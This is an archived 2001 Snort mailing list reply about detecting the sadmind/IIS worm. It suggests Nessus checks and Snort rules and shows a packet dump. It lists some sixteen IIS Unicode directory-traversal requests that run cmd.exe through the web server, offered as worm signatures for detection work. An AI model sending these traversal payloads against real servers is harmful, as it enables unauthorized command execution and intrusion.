Snort mailing list archives
Re: sadmind rule
From: Polar Bear <polus2000 () yahoo com>
Date: Wed, 9 May 2001 15:08:20 -0700 (PDT)
Hi all, The combination of these two rules is great. Also we can run Nessus against all/suspected hosts using GUI or from command line/script: nasl -t host.in.question /usr/lib/nessus/plugins/iis_dir_traversal.nasl or do it all manually. (here is what sadmin/iis worm sends although i'm not sure , haven't seen the code compiled from different sources): GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dirHTTP/1.0 GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 GET /online/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0 GET /scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0 GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1 GET /scripts/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0 GET /msadc/..%e0%80%afq../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+..\ HTTP/1.0 GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0 Nessus does 5 checks (do we need to add more?): /scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ /msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ /_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ /_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ /..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\ Zh. --- On Wed, 9 May 2001, Andrew Daviel wrote:
We were just hit by the sadmind/IIS worm http://www.cert.org/advisories/CA-2001-11.html I've been trying to retroactively find what might
have been actually
attacked buried in all the port 80 traffic alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:
"sadmind"; flags: PA;
content: "GET /scripts/root.exe"; )
It's also nice to have a generic rule that looks for IIS boxes responding to the "dir" requests with an actual directory listing. For example something like: alert tcp $INTERNAL 80 -> $EXTERNAL any (msg: "Directory listing response - possible vulnerable IIS"; flags: AP; content: "|20 44 69 72 65 63 74 6F 72 79 20 6F 66|"; depth: 13;) ...which may catch something like: VULN_IIS:80 -> ATTACKER:41742 TCP TTL:127 TOS:0x0 ID:33953 IpLen:20 DgmLen:1500 DF ***AP*** Seq: 0xDF622603 Ack: 0xF95527CF Win: 0x4411 TcpLen: 20 20 44 69 72 65 63 74 6F 72 79 20 6F 66 20 63 3A Directory of c: 5C 70 72 6F 67 72 61 6D 20 66 69 6C 65 73 5C 63 \program files\c 6F 6D 6D 6F 6E 20 66 69 6C 65 73 5C 73 79 73 74 ommon files\syst 65 6D 5C 6D 73 61 64 63 0D 0A 0D 0A 32 30 30 30 em\msadc....2000 2D 31 30 2D 30 39 20 20 30 39 3A 32 39 20 20 20 -10-09 09:29 20 20 20 20 3C 44 49 52 3E 20 20 20 20 20 20 20 <DIR> 20 20 20 2E 0D 0A 32 30 30 30 2D 31 30 2D 30 39 ...2000-10-09 ... Regards, Andreas Östling __________________________________________________ Do You Yahoo!? Yahoo! Auctions - buy the things you want at great prices http://auctions.yahoo.com/ _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: http://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- sadmind rule Andrew Daviel (May 09)
- Re: sadmind rule Max Vision (May 09)
- Re: sadmind rule Andrew Daviel (May 09)
- Re: sadmind rule Andreas Östling (May 09)
- Re: sadmind rule Andrew Daviel (May 09)
- Re: sadmind rule Andreas Östling (May 09)
- Re: sadmind rule Chris Green (May 09)
- <Possible follow-ups>
- RE: SadMind rule Steve Halligan (May 09)
- snortsnarf Aaron McKinnon (May 09)
- Re: sadmind rule Polar Bear (May 09)
- Re: sadmind rule Max Vision (May 09)